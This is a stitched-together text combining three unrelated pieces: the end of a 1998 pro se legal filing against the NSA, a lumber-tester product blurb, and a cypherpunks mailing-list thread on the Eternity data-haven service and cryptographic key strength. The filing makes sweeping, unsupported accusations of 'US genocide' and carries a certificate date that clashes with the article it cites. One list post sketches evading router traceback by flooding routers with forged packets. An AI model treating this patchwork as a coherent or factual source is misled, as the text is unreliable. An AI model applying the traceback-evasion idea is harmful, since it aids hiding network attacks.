  In a lengthy interview on CNN, Iran's new president, Mohammad   
  Khatami, skillfully analyzed the bitter relations between the   
  two nations and cautiously extended an olive branch to 
  Washington, calling for an end to their 19-year cold war. 
 
  Khatami's diplomatic ju-jitsu flummoxed the Clinton   
  administration, which was busy trying to rally international 
  support against Tehran - and to overthrow Iran's elected 
  government.  
 
  Both capitals are split over the question of relations.  

  In Washington, the military establishment and conservative   
  Republicans have inflated Iran into a bogeyman to 
  justify military budgets and keep U.S. forces in the Mideast.  
  ...

  America incited Iraq to invade Iran in 1980. They did this to 
  crush the Islamic revolution, then provided massive war aid to 
  Saddam Hussein. Half a million Iranians died.  
 
The US got caught involved in genocide.  Using high tech.

This is one subject of this lawsuit.

Albuquerque Journal Tuesday 1/13/98 carried the editorial.
  
  Khatami Move Is Profile in Courage
  Richard Reeves
  Syndicated Columnist

  LOS ANGELES -  If an American leader had done what
  Iranian President Mohammed Khatami did last Wednesday,
  it would have been hailed as a profile in courage. ...

  Miscalculation!  We armed and pampered Saddam Hussein in
  the hope that Iraq would destroy Iran.  Now that's policy and
  behavior to think about. Here is something to think about: If
  Presidents Eisenhower and Kennedy had pursued any kind of
  sensible policy toward Cuba and Fidel Castro - opposed to
  the policy of trying to assassinate him - there never would 
  have been a Cuban missile crisis.

    I think Iranians have financed and encouraged terrorism
  against the interests of the United States and Israel.  I   
  would not be surprised at all if something like proof emerges 
  soon, perhaps anonymously, from the CIA and other government 
  agencies, where many officials have built their careers on 
  sanctioning and isolating Iran, to try to straighten the 
  backbones of the president and people of the United States.

    If they succeed, America fails.  What would be more 
  effective in closing down Iranian terrorism?  More hostility, 
  sanctions and charges?  Or beginning the process toward more 
  normal relations with a country positioned and born to be   
  great? ...

Clearly genocide fits into

  Now that's policy and behavior to think about.

The wired world is watching what this Court, hopefully

minus judges Svet and Campos, will do.

What is there to be?  A series of possibly unfortunate

events?  

Or does this Court order release the lawfully requested 

documents to help settle this American tragedy?


WHEREFORE.

7 Have replacement judges of this Court DENY Mitchell's

  Plaintiffs requested a stay. Absent a ruling from
  this Court denying their request, they cannot proceed to 
  assert that the Requests for Admissions are deemed admitted. 
  Accordingly, Plaintiffs' "Motion For Summary Judgment On Based 
  On Evidence From Admissions" must be denied.

for reason that Mitchell's request to subvert both the Discovery

processes and its time limits have no basis in law.  And appears 

to plead to judges who do not obey the Federal Rules of Civil

Procedure.

9  IMMEDIATELY ORDER Defendant to release the requested 

documents in the interest of national safety so that this 

matter can be settled. 

Aggrieved victims of  US genocide are reading these pleadings.

                    Respectfully submitted, 
 
 
                    _________________________ 
                    William H. Payne             	   	     
                    13015 Calle de Sandias NE          	     
                    Albuquerque, NM 87111              	     
 
 
                    _________________________				 
                    Arthur R. Morales                            
                    1024 Los Arboles NW                         
                    Albuquerque, NM 87107                        
 
                    Pro se litigants 
 
 
CERTIFICATE OF SERVICE 
 
I HEREBY CERTIFY that a copy of the foregoing memorandum
was mailed to Lieutenant General Kenneth A. Minihan, USAF, 
Director,  National Security Agency, National Security Agency, 
9800 Savage Road, Fort George G. Meade, MD 20755-6000 
and hand delivered to  John J. Kelly, US Attorney, 525 Silver 
SW, ABQ, NM 87102 this  Tuesday January 20, 1997. 




5




Title: 





Model 7200 HCLT High Capacity Lumber Tester



The Metriguard Model 7200 High Capacity Lumber Tester was introduced in 1993.  This machine is now certified by grading agencies in the United States, Canada and UK. Also in use in Japan and Austria. 

Speed capacity is unknown.  We have run tests in excess of 2,000 ft/min, and have not seen any limitations or indications that it would not run faster. We expect this machine to keep up with planer developments and run in the neighborhood of 3,000 ft/min sometime within the next ten years. 
The machine is available with a number of options, including the recently introduced PC Data System, which adds new capability in marking options, shift reports, and internal error checking.  Yet to come in Metriguard's program of continuous improvement are automatic wood temperature compensation, automatic zero tracking, scanner inputs. 
Please contact Metriguard Sales office for further information about how this machine can improve your lumber grading and mill profits.  

Return to home page 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kay Ping <kping@nym.alias.net>
Date: Sun, 18 Jan 1998 17:42:03 +0800
To: cypherpunks@toad.com
Subject: Eternity - an alternative aproach (take 2)
Message-ID: <19980118093226.22373.qmail@nym.alias.net>
MIME-Version: 1.0
Content-Type: text/plain



"Romeo, she is a female Homo Sapiens, not a full rotation of the Earth during the season when the incident solar radioation is at a higher angle"

"Yes, I know that. It was just a metaphore."

I got several comments about my posting, all of them about the possibility of detecting the location of radio transmitters or receivers.

You just didn't get it, did you? I was using radio as a METAPHORE for the use of broadcast to provide anonymity to receivers and packets with false source addresses for the anonymity of transmitters. 

You can read the original posting at http://infinity.nus.sg/cypherpunks/current/0107.html

-----------------
Kay Ping 
nop 'til you drop

finger kping@nym.alias.net for key
DF 6D 91 18 A6 59 41 96 - 89 01 69 B7 9D0 4 AE 53






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@mit.edu>
Date: Sun, 18 Jan 1998 22:37:08 +0800
To: Matt Barrie <matt.barrie@stanford.edu>
Subject: Re: (eternity) Eternity as a secure filesystem/backup medium
In-Reply-To: <3.0.5.32.19980117194905.008024e0@pobox1.stanford.edu>
Message-ID: <199801181433.JAA13137@the-great-machine.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


> Since documents placed on eternity by specification last forever (assuming,
> of course, that
> eternity will too) and assuming that computational power and cryptanalysis
> will always
> get better (say for arguments sake that moore's law continues to be held) -
> doesn't that
> mean that it will be feasible (in time) to break all eternity documents? :)

Documents by specification last only as long as someone is willing to pay
to keep them up.  This is not necessarily forever.  Once your DBC escrow
"account" runs out, the data is worthless -- someone could then choose to
store it on their own, and potentially charge others for this in
a recursive model, but there is no reason why a piece of data must
remain in Eternity forever if no one cares enough about it to pay to
have it stored.
> 
> Of course "in time" may very well be a very long (or astronomical) time,
> but dependent on the crypto
> used who knows what rate "feasible" breaking of a particular algorithm
> might progress at, say
> in d(key length)/d(year)? Can we assume that using Moore's law this is at
> least 1 bit every
> 18 months for symmetric crypto? Perhaps we might see this relationship
> through the RSA challenges
> over time.

I am designing Eternity DDS with IDEA/3DES/Blowfish level private-key
crypto and an equivalent level of DH/RSA public key crypto.  These will
be strong (provided back door attacks, fundamental breakthroughs in
cryptography, etc. are not made...a bet I'm forced to make, even though
I don't like it) well into the future.  How far?  I think unless
Quantum Cryptanalysis becomes a reality, the underlying hard problems
will not be solved through anything but a fundamental change in mathematics.
As Prof. Micali said, "Gauss (Karl Friedrich Gauss, the reknowned
mathematician/physicist/general smart guy) worked on these problems.  The test 
of whether a problem is sufficiently hard to be a basis for a cryptosystem
is if Gauss tried to solve it and failed." or something similar.
> 
> [If Wiener's $1m DES machine in '93 took 7 hours, in today's technology $1m
> in 1998 dollars should
> be able to do this in less than 100 minutes, shouldn't it?]

I don't think anyone would argue that 56bit is secure enough for anything
but ephermeal channel authentication.  I'd make the same argument for 64bit --
if you had a purpose-built machine with an intelligent key distribution
system, a well nigh unlimited budget (read: US Military), and PE's which
contained either ultrahigh performance GaAs logic or massively parallel
on a single chip silicon logic, you could probably brute force a 64bit
algorithm.

Do the math, though, for 128bit.  There are traditional analyses which include
the amount of silicon on the earth, the number of atoms in the universe,
etc.  The general consensus is that traditional techniques are not feasible
for brute forcing 128bit ciphers before the heat death of the universe.
> 
> Since documents cannot be retracted or re-encrypted you really have to
> assume that someday they
> will be broken. This really turns the notion of what crypto to use for
> encrypting eternity documents
> into an upfront question of "how long do I want this information to be
> secure?". 20 years? 50 years?
> 100 years?
> 
> matt

Actually, Eternity is no different than emailing a file, given a SIGINT
capability at the attacker which allows all internet traffic to be monitored.
If the data is still relevant and worth breaking in 50 years, they could
just intercept the encrypted email, store it in a government vault for
50 years, then attack it (even more amusingly, they could simply
post it to Eternity themselves, encrypted with their own key :), a true
turn about).

If you do not postulate that level of signals collection capability on the
part of the attacker, yeah, Eternity is a bit different than email.  But
I think that would be an unreasonable model of the attacker.

- -- 
Ryan Lackey
rdl@mit.edu
http://mit.edu/rdl/		



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBNMISuKwefxtEUY69AQFB1Qf9GWDn6bwhWyJcDY0Liypo21ntpH5yzORu
RXwkPSI8pbmqhVZAVGXC1WbcqY0pYn7vPRFq5AKszFsjpTOOYiHwsugmVKjrxVww
GRKSBqn308aAjMogNtPwEfohJrQxOED/Hy7ykV6gHV76pUFoMazQ4OdUL2iM1hLF
cCMzwtpfJM5eWvyLeQcQq307998epJ9hF1e3Sn4v6ZKEPIlr0yqr5tvM7/XWxC2s
6t82EUPmOZIbn75QQqLBIFK5MlOLuvalFr0xR3u7fYltOczAMC23hx7Tjk65e9a4
6XSeEXyMp2j2GWqcE5lUZp4OnewZvSoFhEj0rDo5PEN9ce0mJEKMow==
=7IBY
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 18 Jan 1998 23:11:23 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: (eternity) Eternity as a secure filesystem/backup medium (fwd)
Message-ID: <199801181540.JAA17053@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: (eternity) Eternity as a secure filesystem/backup medium 
> Date: Sun, 18 Jan 1998 09:33:30 EST
> From: Ryan Lackey <rdl@mit.edu>

> Documents by specification last only as long as someone is willing to pay
> to keep them up.  This is not necessarily forever.

Admiral Hopper used to give a talk about the worth of data and she had a
very nice chart that would demonstrate the worth of data over time. Initialy
it is worth a lot because it is hard to reproduce, obtain, or distribute. As
time goes on it becomes less and less important. In her particular context
it was related to the economic decision of when to move data offline in
large database applications.

> Once your DBC escrow
> "account" runs out, the data is worthless

That's a jump of logic. The data may infact be quite popular even though you
don't offer it anymore (might even do this in order to increase its worth, 
say some sort of insider trader newsletter). It's probably not in the best
interest of the data haven model to speculate on exactly why a particular
source decides to quit sourcing.

> remain in Eternity forever if no one cares enough about it to pay to
> have it stored.

Then again, if it was really important I might intentionaly want to attack
the ability to provide long-term income. A better model might be to charge
for the access and let the actual submission be no charge. A portion of the
retrieval charge could then be piped back to the source. Consider the case
of say nuclear or biological information for a weapon. That sort of data
would be accessed only infrequently (unless you're giving something this
expensive to obtain and verify away - a d-h operator error, no.) but should
be quite expensive to retrieve.

> If the data is still relevant and worth breaking in 50 years, they could
> just intercept the encrypted email, store it in a government vault for
> 50 years,

More realisticaly they would have somebody just add it to a batch job and
let the spare cycles of the machines crank away at it. Or perhaps set up a
key challenge and get people all over the world to work on it in their spare
cycles. Who knows, perhaps the source of the data woudl be intriqued enough
to provide spare cycles unknowingly.

> If you do not postulate that level of signals collection capability on the

It's not just their sig-int capability but their complete processing
resource capability that must be considered as well as their psychological
motivation. Granted, all of these are extremely difficult to measure let
alone verify. Perhaps a little paranoia might be a good thing.



    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 19 Jan 1998 00:04:33 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Signed document - a thought...
Message-ID: <199801181631.KAA17197@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

I was pondering the security issues regarding signed documents and key
security. It occured to me that in all the discussion it is assumed that the
document is transmitted after the key is transmitted.

It seems to be that a higher level of security could be obtained by
submitting the signed document first and then submit the signing key.

This way when the document goes out Mallet has no idea what key to replace
and any fudging of the document will destroy the sign. Then when the key
goes out if it is replaced the document won't pass testing either since the
server already has a unmod'ed copy.

In short, instead of having each author have a signing key, have each
document have a signature key and always submit the signed document prior
to the signing key. After all it's the document and not the author (who we
assume is already using an anonymous submission mechanism) we wish to verify
from the end users perspective.

The mechanims provides a means for the data haven server to verify the
authenticity of the document and this allows them to pass that trust on to
the end user in the same sort of way.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lord_buttmonkey@juno.com (Matthew L Bennett)
Date: Mon, 19 Jan 1998 00:17:48 +0800
To: cypherpunks@toad.com
Subject: Re: Spam
In-Reply-To: <l03020901b0ded4fdda62@[209.130.130.104]>
Message-ID: <19980118.110654.3782.7.Lord_Buttmonkey@juno.com>
MIME-Version: 1.0
Content-Type: text/plain



>>Another approach to reducing spam is of course to keep contacting
>>ISPs to kill off bad users, and to get ISPs to refuse spamhauses
>>as customers.

<snip>

>I love Eudora for a very simple reason: the simplicity
>of the filters offered in even the free version.

On the note of filters:
Why are Netscape Communicator's filters nonworking?  I couldn't get them
to work, *ever*.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 19 Jan 1998 00:38:22 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Signed document - a thought... (fwd)
Message-ID: <199801181708.LAA17343@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Jim Choate <ravage@ssz.com>
> Subject: Signed document - a thought...
> Date: Sun, 18 Jan 1998 10:31:36 -0600 (CST)

> document have a signature key and always submit the signed document prior
> to the signing key. After all it's the document and not the author (who we
> assume is already using an anonymous submission mechanism) we wish to verify
> from the end users perspective.

One other assumption that I left out after I sent it was that the data haven
and the key server are not the same machine. Sorry, I hope it makes a tad
more sense with that proviso included.

Sorry for sending an incomplete suggestion.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@mit.edu>
Date: Mon, 19 Jan 1998 00:29:25 +0800
To: Kay Ping <kping@nym.alias.net>
Subject: Re: Eternity - an alternative approach
Message-ID: <tw7btx9lpr0.fsf@the-great-machine.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



(Kay Ping) writes:
> It occured to me that the equivalent on the net would be to receive
> packets with invalid source addresses. They are just there, coming dowm
> the phone line to your modem. It takes significant resources and snooping
> on a massive scale to locate where they are coming from.. All this is
> assuming you can find some way to send a request with your address to the
> server.

I've looked at this idea for a while.  It's great right now once you
get away from the first couple of subnets, though.

However, I've recently become aware of "IDIP", or "Intruder Detection
and Isolation Protocol" through potentially questionable sources (my
source is mostly NDA-wary).  He assumes it will be implemented by
having each router cache IP address, received interface tuples.

Then, after the fact, one could go back and track someone router by 
router.

The technical solution to this is to flood a router with forged packets
while using it to transfer your own data, overflowing the cache.

This presents the problem of being tracked by leaving a cloud of flooded
routers in your wake.  But it's possible.

I get the impression the system is far from deployment, but that it is
being worked on is a sign that potentially someone sees the rise in
forged source address attacks and wants to curtail it.  
-- 
Ryan Lackey
rdl@mit.edu
http://mit.edu/rdl/		





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvdi.net>
Date: Mon, 19 Jan 1998 03:49:21 +0800
To: Jim Choate <cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: how to release code if the programmer is a target for (fwd)
In-Reply-To: <199801180123.TAA16226@einstein.ssz.com>
Message-ID: <v03102808b0e809baaf1d@[208.129.55.202]>
MIME-Version: 1.0
Content-Type: text/plain



At 7:23 PM -0600 1/17/98, Jim Choate wrote:
>Forwarded message:
>
>> Subject: Re: how to release code if the programmer is a target for (fwd)
>> From: Ryan Lackey <rdl@mit.edu>
>> Date: 17 Jan 1998 19:07:10 -0500
>
>> Eternity delivers data.  It's up to the user to verify that the data is
>> what they want
>
>> The original question was how to verify the eternity server source code.
>
>How are these fundamently different? Assume for a moment that as a user of
>an eternity server the source is the data I want.

(I didn't see anyone comment on my posting under "Re: remailer resistancs to attack", so I thought I'd repost under this thread.  My apologies for any inconvience.)

Came across this paper and thought it might contribute to improving remailer reliability, "How to Maintain Authenticated Communication in the Presence of Break-ins," http://theory.lcs.mit.edu/~tcryptol/OLD/old-02.html

--Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Crispin <kent@songbird.com>
Date: Mon, 19 Jan 1998 04:09:31 +0800
To: Cypherpunks Distributed Remailer <eternity@internexus.net
Subject: Re: (eternity) Eternity as a secure filesystem/backup medium (fwd)
In-Reply-To: <tw790sdllr5.fsf@the-great-machine.mit.edu>
Message-ID: <19980118120234.40255@songbird.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, Jan 18, 1998 at 12:45:02PM -0500, Ryan Lackey wrote:
[...]
> 
> Data disappears from Eternity once no one cares enough about it to pay to
> have it stored.  That could mean someone doesn't pay in advance for the data,
> or no one is willing to invest disk space in the hope that it will in
> the future be downloaded.
> 
> Providing eternity service costs money.  Anything which lets users circumvent
> this opens up the potential for denial of service through consumption of
> resources attacks.  Even if billing is fundamental, you still have the
> potential for the NSA to spend $100m to buy all the eternity space available
> at any point.  This is why you also need market mechanisms -- if the NSA
> is willing to pay a premium for eternity service just to keep it out of
> the hands of the populace, then running eternity servers is a great 
> investment, so capacity will increase until the NSA can no longer afford
> to buy all of it.
> 
> A difficult part of designing a working Eternity service is to keep people
> from "stealing service", in terms of consumption of resources, during
> set up, indexing, etc.  Basically, you need to make sure that to the 
> greatest extent possible, anything which is a potentially scarce resource
> is sold, not given away.

There are alternative ways of paying for the service that do not in
any way depend on ecash, and after thinking about it a bit, they seem
more robust, as well. 

The basic idea is as follows:  The fundamental eternity service is 
free to readers, and is financed entirely by writers.  The writers 
supply the disk space, the network bandwidth, and possibly pay for 
the software to support all this.

In a little more detail: you have say 1 megabyte of data that you
would like to be stored in the Eternity Service.  The overhead of
storage in eternity is a factor of two, and you would like 10 times
redundancy.  So you contact the Eternity Service Software provider, and 
get the software.  You then configure the software to supply 20 
megabytes of your disk space to the system.  This allows you to 
supply 1 meg of your own data.

The 20 megs will of course not store *your* data -- it will store
other eternity data.  The service takes your data and spreads it
across 10 other sites, whose locations are unknown and unknowable to
you.  In return, you are storing eternity data for other users.  If
your disk space becomes unavailable your file disappears from the
service.  (Of course, someone else could pick it up and store it, if
it was valuable information.)

This is a self-financing model.  Every writer to the eternity service
pays for their own bandwidth and disk space.  The eternity service
provider is financed by maintaining the software that all the writers
use -- client/server software will have to run on many different
platforms, some protocols may be better than others, and it might be 
worth buying your eternity software from a high-reputation 
("trustworthy") provider.

Note that this doesn't mean that data suppliers can't be paid for
providing data -- but that is a completely separable problem that can
have many different solutions.

I believe this approach does solve the financing part.  But it does
make the rest a *very* complicated problem -- you have a dynamic,
self-configuring network of data sources and sinks, with all the
configuration data encrypted along with the data.  Ideally, of course,
the data would be migrating constantly. 

Retrieval would probably be very slow -- basically email speeds, or 
worse.  In fact, perhaps the data would be retrieved by having the 
eternity service use the remailer network to send it...

-- 
Kent Crispin				"No reason to get excited",
kent@songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@mit.edu>
Date: Mon, 19 Jan 1998 01:48:30 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: (eternity) Eternity as a secure filesystem/backup medium (fwd)
Message-ID: <tw790sdllr5.fsf@the-great-machine.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



(Jim Choate) writes:

> Ryan Lackey writes: 
> > Once your DBC escrow
> > "account" runs out, the data is worthless
> 
> That's a jump of logic. The data may infact be quite popular even though you
> don't offer it anymore (might even do this in order to increase its worth, 
> say some sort of insider trader newsletter). It's probably not in the best
> interest of the data haven model to speculate on exactly why a particular
> source decides to quit sourcing.

True.  But in an Eternity model without copyright, someone could be one of
the first customers to download the data, then upload it again under a
different name.  The only thing the original uploader would have as
an advantage would be indexing information, potentially -- it's easier
for me to download ms word by going to the eternity equivalent of
http://www.microsoft.com/ than to go to 
http://www3.pop3-167.adhoc.warez.location.ai/edf3/filez1.zip.

There's no real way to put the genie back into the bottle unless you can
send people with guns to beat people up who store your data as a third party.

Data disappears from Eternity once no one cares enough about it to pay to
have it stored.  That could mean someone doesn't pay in advance for the data,
or no one is willing to invest disk space in the hope that it will in
the future be downloaded.

Providing eternity service costs money.  Anything which lets users circumvent
this opens up the potential for denial of service through consumption of
resources attacks.  Even if billing is fundamental, you still have the
potential for the NSA to spend $100m to buy all the eternity space available
at any point.  This is why you also need market mechanisms -- if the NSA
is willing to pay a premium for eternity service just to keep it out of
the hands of the populace, then running eternity servers is a great 
investment, so capacity will increase until the NSA can no longer afford
to buy all of it.

A difficult part of designing a working Eternity service is to keep people
from "stealing service", in terms of consumption of resources, during
set up, indexing, etc.  Basically, you need to make sure that to the 
greatest extent possible, anything which is a potentially scarce resource
is sold, not given away.

> 
> > remain in Eternity forever if no one cares enough about it to pay to
> > have it stored.
> 
> Then again, if it was really important I might intentionaly want to attack
> the ability to provide long-term income. A better model might be to charge
> for the access and let the actual submission be no charge. A portion of the
> retrieval charge could then be piped back to the source. Consider the case
> of say nuclear or biological information for a weapon. That sort of data
> would be accessed only infrequently (unless you're giving something this
> expensive to obtain and verify away - a d-h operator error, no.) but should
> be quite expensive to retrieve.

You then are vulnerable to someone spamming the system, unless you give
the server operator some way of knowing if this encrypted data is likely
to be valuable.

I think both payment models should coexist.  But there's no reason that
the server operators are the only people able to speculate -- it could
be just another random user.

You can have arbitrarily complex payment models, since the enforcement
agents can exist (must exist?) as eternity objects in their own right.

> 
> > If the data is still relevant and worth breaking in 50 years, they could
> > just intercept the encrypted email, store it in a government vault for
> > 50 years,
> 
> More realisticaly they would have somebody just add it to a batch job and
> let the spare cycles of the machines crank away at it. Or perhaps set up a
> key challenge and get people all over the world to work on it in their spare
> cycles. Who knows, perhaps the source of the data woudl be intriqued enough
> to provide spare cycles unknowingly.

No, the most feasible attacks for a resourced attacker are custom ASICs
optimized for key testing, as were recently described.  Distributed
workstation cracking is a parlor trick if you have a billion dollar budget
for key cracking.

The NSA has general purpose HPC resources for purposes like signal processing,
AI, etc., not for brute forcing people's keys routinely (although perhaps for 
a weak and nonstandard cipher, it would make sense to use general purpose
machines).  Even a corporation would be better off using FPGAs or ASICs for
key cracking once you get past 56 bits.

> 
> > If you do not postulate that level of signals collection capability on the
> 
> It's not just their sig-int capability but their complete processing
> resource capability that must be considered as well as their psychological
> motivation. Granted, all of these are extremely difficult to measure let
> alone verify. Perhaps a little paranoia might be a good thing.

I assume the attacker is evil and rational.  I also assume that the
entire legal system has been subverted, and that extralegal operations of
any size too small to make the new york times front page are possible.  And,
any entity which deals with the government (just about any) can be subverted.

Thinking that the major internet gateways between providers are bugged by
the NSA isn't really too unreasonable if you accept those assumptions.
> 
> 
> 
>     ____________________________________________________________________
>    |                                                                    |
>    |       The most powerful passion in life is not love or hate,       |
>    |       but the desire to edit somebody elses words.                 |
>    |                                                                    |
>    |                                  Sign in Ed Barsis' office         |
>    |                                                                    | 
>    |            _____                             The Armadillo Group   |
>    |         ,::////;::-.                           Austin, Tx. USA     |
>    |        /:'///// ``::>/|/                     http://www.ssz.com/   |
>    |      .',  ||||    `/( e\                                           |
>    |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
>    |                                                 ravage@ssz.com     |
>    |                                                  512-451-7087      |
>    |____________________________________________________________________|

-- 
Ryan Lackey
rdl@mit.edu
http://mit.edu/rdl/		





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sun, 18 Jan 1998 22:40:04 +0800
To: wabe@smart.net
Subject: Re: uh,
In-Reply-To: <004601bd23fa$76d1d0a0$a78588d1@justice>
Message-ID: <199801181249.MAA00208@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain



Wabe <wabe@smart.net> writes:
> What is that weird lawsuit all about where
> some director of the NSA is getting sued for
> something?  Does anyone know?

Bill Payne used to work for one of the US national labs, he did some
work funded by NSA at that lab.  He considered that the NSA were
making incompetent cryptographic decisions endangering national
security.

He's suing them over their attempts to silence his criticisms by
working behind the scenes to deprive him of research funding.

Bill will have to provide a better summary himself, as the above is
from memory, and I wasn't paying that much attention, and the above
could be garbage.

The practice of suing the director of NSA "DIRNSA" in such suits
involving disputes with NSA is common practice... Dan Bernstein's case
pursued by EFF, John Gilmore etc, and Peter Junger's case (both
arguing that the ITAR/EARs are unconstitutional) involved suing the
NSA, DIRNSA and a list of other misc. government officials.

Adam

btw. your netscape set up is broken... it includes an html version of
your post below the ascii version.  There is a setting somewhere were
you have a choice to send ascii, or html or both.  You clearly have
this set to both.

> ------=_NextPart_000_0043_01BD23B7.67DD8500
> Content-Type: text/html;
> 	charset="iso-8859-1"
> Content-Transfer-Encoding: quoted-printable
> 
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD W3 HTML//EN">
> <HTML>
> <HEAD>
> 
> <META content=3Dtext/html;charset=3Diso-8859-1 =
> http-equiv=3DContent-Type>
> <META content=3D'"MSHTML 4.72.2106.6"' name=3DGENERATOR>

[...]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 19 Jan 1998 01:51:30 +0800
To: Ryan Lackey <rdl@MIT.EDU>
Subject: Re: Eternity - an alternative approach
Message-ID: <1.5.4.32.19980118175025.006deea8@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Ryan Lackey wrote:

>However, I've recently become aware of "IDIP", or "Intruder Detection
>and Isolation Protocol" through potentially questionable sources (my
>source is mostly NDA-wary).

Ryan,

Any chance you could get more info on this and pass it along? Or maybe 
your source could spec it through a remailer if you can persuade that
the cutout is truly inviolable.

Thanks,

John





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Mon, 19 Jan 1998 06:02:30 +0800
To: "wabe" <cypherpunks@toad.com>
Subject: Re: e-mail muddling.
In-Reply-To: <008801bd22cf$131ec440$ab8588d1@justice>
Message-ID: <3.0.5.32.19980118125130.00836aa0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 02:35 PM 1/16/98 -0800, wabe wrote:
>    --
>Also wouldn't it be easier to de-muddle an e-mail
>message than a brute force attack?  I mean,
>you KNOW what muddled it.  And you know
>the general way it got muddled.  It's not pgp,
>it's just some line breaks a bit too early for their
>time...

Not particularly.  If the muddler wraps all lines at
N characters, then you can guess that all lines N characters long
can probably be put back together, which isn't hard,
but if it also loses any white space (e.g. trailing spaces)
then you've got exponentially many possibilities.
It may be worth trying to fix a couple of the easy ones, though.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 19 Jan 1998 02:36:50 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: (eternity) Eternity as a secure filesystem/backup medium (fwd)
Message-ID: <199801181904.NAA17705@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: (eternity) Eternity as a secure filesystem/backup medium (fwd)
> From: Ryan Lackey <rdl@mit.edu>
> Date: 18 Jan 1998 12:45:02 -0500

> True.  But in an Eternity model without copyright, someone could be one of
> the first customers to download the data, then upload it again under a
> different name.

So in your model there isn't any form of check on the data for redundency?

> The only thing the original uploader would have as
> an advantage would be indexing information, potentially -- it's easier
> for me to download ms word by going to the eternity equivalent of
> http://www.microsoft.com/ than to go to 
> http://www3.pop3-167.adhoc.warez.location.ai/edf3/filez1.zip.

Not if it's:

http://ww.microsoft.com/software/commercial/wordprocessing/msword/x.y/ \
msword.zip

This is a specious point. The fact is that from the users perspective the
index would automagicaly provide the actual resting place for the server
to find it, even if it were on a different server. The whole point is to
make the software do the druggery. The length of the pathname or URL is
irrelevant at that point.

> There's no real way to put the genie back into the bottle unless you can
> send people with guns to beat people up who store your data as a third party.

The point being that if we take the average user of a data haven model they
don't have the resources (money, technical skill, bandwidth, etc.) to set up
a data haven of their own. Further, the storing of the data by other parties
isn't the issue, it isn't the data havens data. This is one of the primary
